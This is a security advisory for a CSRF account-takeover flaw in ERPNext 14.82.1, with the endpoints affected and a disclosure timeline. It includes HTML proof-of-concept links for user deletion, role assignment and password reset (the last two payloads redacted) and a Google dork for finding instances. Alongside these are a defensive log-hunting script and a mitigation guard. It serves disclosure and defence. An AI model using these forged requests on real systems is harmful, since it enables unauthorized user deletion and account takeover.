Vendor: ERPNext
By: Ahmed Thaiban (Thvt0ne)
CVSS: 6.1 (HIGH)
Title: Cross-Site Request Forgery (CSRF) leading to Account Takeover
CWE: 352
Product Name: ERPNext
Affected Versions: <= 14.82.1 (14.74.3 also tested)
Patch Exists: NO
CVE: CVE-2025-28062
CPE: a:frappe:erpnext:14.82.1
Platforms Tested: Linux (Ubuntu 20.04), Chrome, Firefox
Year: 2025

ERPNext 14.82.1 – Account Takeover via Cross-Site Request Forgery (CSRF)

A CSRF vulnerability in ERPNext 14.82.1 and 14.74.3 lets an attacker who lures a logged-in administrator to a malicious page issue state-changing API requests in that administrator's session: the affected endpoints accept GET requests carrying the session cookie and do not require a CSRF token. The result is unauthorized user deletion, role assignment, and account takeover by changing another user's password.

Mitigation:

To mitigate this issue, enforce CSRF protection on all administrative endpoints, mandate the use of POST requests for state modifications, set cookies as SameSite=Strict, and introduce re-authentication mechanisms for critical user modifications.

Exploit-DB raw data:

# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps

# Description:
A Cross-Site Request Forgery (CSRF) vulnerability leading to account takeover exists in ERPNext 14.82.1 and 14.74.3. It allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.

Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs

Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change

The application does not require a CSRF token on these administrative API requests and accepts them over GET, so a link or image on any page the administrator visits can trigger them with the administrator's session cookie attached. This violates OWASP's CSRF prevention recommendations.
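For responders who want to know whether the two endpoints above were ever hit this way, the following is an added example (not part of the original advisory and not Frappe/ERPNext code) that runs a detection rule over web server access logs. The log lines are constructed for illustration; the assumed format is nginx "combined" with an extra quoted Origin field appended, which is a deployment-specific log_format and not a default.

```python
"""Hunt for CSRF-style hits on Frappe's state-changing API methods in access logs.

Added example, not part of the original advisory or of Frappe/ERPNext. The log
lines are constructed for illustration; the assumed format is nginx 'combined'
with an extra quoted Origin field appended (a deployment-specific log_format).
"""
import re
from urllib.parse import parse_qs, urlsplit

# The two endpoints named in the advisory. Any GET to these is wrong by itself
# (state changes must be POST); a cross-site Referer/Origin makes it a likely CSRF hit.
STATE_CHANGING_METHODS = {
    "frappe.desk.reportview.delete_items",
    "frappe.desk.form.save.savedocs",
}

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<origin>[^"]*)"'
)

# Constructed sample: two forged GETs from a lure page (mirroring the PoC URLs, with
# an empty doc for savedocs), one legitimate same-site POST, and one harmless GET read.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Apr/2025:10:01:02 +0000] "GET /api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User HTTP/1.1" 200 45 "http://attacker.example/lure.html" "Mozilla/5.0" "-"
203.0.113.5 - - [29/Apr/2025:10:01:03 +0000] "GET /api/method/frappe.desk.form.save.savedocs?doc=%7B%7D&action=Save HTTP/1.1" 200 61 "http://attacker.example/lure.html" "Mozilla/5.0" "-"
198.51.100.7 - - [29/Apr/2025:10:02:00 +0000] "POST /api/method/frappe.desk.form.save.savedocs HTTP/1.1" 200 61 "https://erp.example.internal/app/user" "Mozilla/5.0" "https://erp.example.internal"
198.51.100.7 - - [29/Apr/2025:10:02:05 +0000] "GET /api/method/frappe.desk.reportview.get?doctype=User HTTP/1.1" 200 1200 "https://erp.example.internal/app/user" "Mozilla/5.0" "-"
"""


def same_site(site_host, url):
    """True/False for a same-site/cross-site URL, None when the browser sent nothing ("-")."""
    if not url or url == "-":
        return None
    return urlsplit(url).hostname == site_host


def analyse(line, site_host):
    """Return a finding dict for a hit on a state-changing method, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["path"])
    if not url.path.startswith("/api/method/"):
        return None
    api_method = url.path[len("/api/method/"):]
    if api_method not in STATE_CHANGING_METHODS:
        return None
    qs = parse_qs(url.query)
    ref_ok = same_site(site_host, m["referer"])
    origin_ok = same_site(site_host, m["origin"])
    # A missing Referer/Origin (Referrer-Policy, privacy extensions) is treated as
    # unknown, not as cross-site, so the rule does not fire on every API call.
    cross_site = ref_ok is False or origin_ok is False
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "method": m["method"],
        "api_method": api_method,
        "doctype": qs.get("doctype", [None])[0],
        "items": qs.get("items", [None])[0],   # decoded: the PoC's items=["1@1.com"]
        "status": int(m["status"]),
        "cross_site": cross_site,
        "suspicious": m["method"] == "GET" or cross_site,
    }


def scan(log_text, site_host):
    """Return only the suspicious findings, in log order."""
    findings = (analyse(line, site_host) for line in log_text.splitlines())
    return [f for f in findings if f and f["suspicious"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, "erp.example.internal"):
        print(f["ts"], f["ip"], f["method"], f["api_method"], f["doctype"], f["items"],
              "cross-site" if f["cross_site"] else "same-site")
```

The rule fires on the request method before it looks at Referer or Origin: a GET to either endpoint is a finding on its own, because the PoC links produce exactly that and a legitimate Frappe client does not. The referer check only adds confidence, since browsers can strip it.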

---

# PoC 1: Delete a User

<html>
  <body>
    <h2>Delete User</h2>
    <!-- A plain GET to a state-changing method with no CSRF token: the victim's
         ERPNext session cookie is sent automatically when an administrator follows
         the link. The items parameter decodes to the JSON list ["1@1.com"]. -->
    <a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
      Click Here
    </a>
  </body>
</html>

---

# PoC 2: Assign Role

<html>
  <body>
    <h2>Assign Role to User</h2>
    <!-- REDACTED_JSON stands for the URL-encoded User document with the extra
         role added (redacted by the author). -->
    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
      Add Role
    </a>
  </body>
</html>

---

# PoC 3: Reset Password

<html>
  <body>
    <h2>Reset User Password</h2>
    <!-- REDACTED_JSON stands for the URL-encoded User document carrying the
         attacker-chosen password (redacted by the author). -->
    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
      Reset Password
    </a>
  </body>
</html>

---

# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes
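The four mitigations listed here, and in the summary at the top of the page, fit in one server-side guard. The code below is an added example and not Frappe's own implementation: a framework-agnostic check over a plain dict standing in for an HTTP request, so it runs offline. The site host, the re-authentication window, the set of critical User fields and the rejection messages are assumptions made for this example; the header name X-Frappe-CSRF-Token follows the header Frappe's web client sends. One caveat a practitioner should note: SameSite=Lax would not stop the PoCs above, because Lax still attaches the cookie to top-level GET navigations such as a link click, which is why the POST-only rule and the token are the controls that actually close the hole.

```python
"""Server-side guard implementing the advisory's four mitigations.

Added example, not Frappe's own code: a framework-agnostic check over a plain dict
that stands in for an HTTP request, so it runs offline. Assumptions for this
example: the site host, the re-auth window, the set of critical User fields, and
the token header name (X-Frappe-CSRF-Token follows the header Frappe's web client sends).
"""
import hmac
import secrets
import time
from urllib.parse import urlsplit

SITE_HOST = "erp.example.internal"     # assumed deployment hostname
REAUTH_WINDOW_SECONDS = 300            # assumed policy: critical changes need a login in the last 5 min
CSRF_HEADER = "X-Frappe-CSRF-Token"

# (DocType, field) pairs whose change must be backed by fresh authentication (assumed policy).
CRITICAL_CHANGES = {("User", "new_password"), ("User", "roles")}


def new_session(user, now=None):
    """Session record: a random per-session synchronizer token plus last-login time."""
    return {"user": user, "csrf_token": secrets.token_hex(32),
            "last_auth": time.time() if now is None else now}


def session_cookie_header(session_id):
    """Set-Cookie value for the session. SameSite=Strict is used deliberately:
    Lax still attaches the cookie to top-level GET navigations, which is exactly
    how the advisory's <a href> PoCs deliver the forged request."""
    return f"sid={session_id}; Path=/; HttpOnly; Secure; SameSite=Strict"


def _host(url):
    return urlsplit(url).hostname if url else None


def check_state_change(request, session, doctype=None, fields=(), now=None):
    """Return None if the request may change state, else a short rejection reason."""
    now = time.time() if now is None else now
    headers = request["headers"]

    # 1. State changes only over POST: anything reachable via <a href>/<img src> is forgeable.
    if request["method"] != "POST":
        return "state-changing call must use POST"

    # 2. Origin check (Referer as fallback). Missing both is rejected, not assumed benign.
    if _host(headers.get("Origin") or headers.get("Referer")) != SITE_HOST:
        return "cross-site or missing Origin/Referer"

    # 3. Synchronizer token bound to the session, compared in constant time.
    if not hmac.compare_digest(headers.get(CSRF_HEADER, ""), session["csrf_token"]):
        return "missing or wrong CSRF token"

    # 4. Fresh re-authentication for password/role changes on User.
    if any((doctype, f) in CRITICAL_CHANGES for f in fields):
        if now - session["last_auth"] > REAUTH_WINDOW_SECONDS:
            return "re-authentication required for critical change"
    return None


def demo():
    """Replay the advisory's forged GET against the guard, then a legitimate POST."""
    sess = new_session("Administrator")
    forged = {"method": "GET", "headers": {"Referer": "http://attacker.example/lure.html"}}
    legit = {"method": "POST", "headers": {"Origin": f"https://{SITE_HOST}",
                                           CSRF_HEADER: sess["csrf_token"]}}
    return {
        "forged_get": check_state_change(forged, sess, "User", ("roles",)),
        "legit_post": check_state_change(legit, sess, "User", ("roles",)),
        "stale_password_change": check_state_change(
            legit, sess, "User", ("new_password",), now=sess["last_auth"] + 3600),
    }


if __name__ == "__main__":
    for name, reason in demo().items():
        print(f"{name}: {'allowed' if reason is None else 'rejected: ' + reason}")
```

The checks are ordered cheapest and most decisive first: the method test alone defeats every PoC on this page, the Origin test catches a forged POST from an auto-submitting form, and the token test covers a same-site page that has been compromised some other way. The re-authentication step is the only one that still applies once the attacker has the token, which is why it is reserved for password and role changes.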

---

# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory

---

# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne

# References:
- https://owasp.org/www-community/attacks/csrf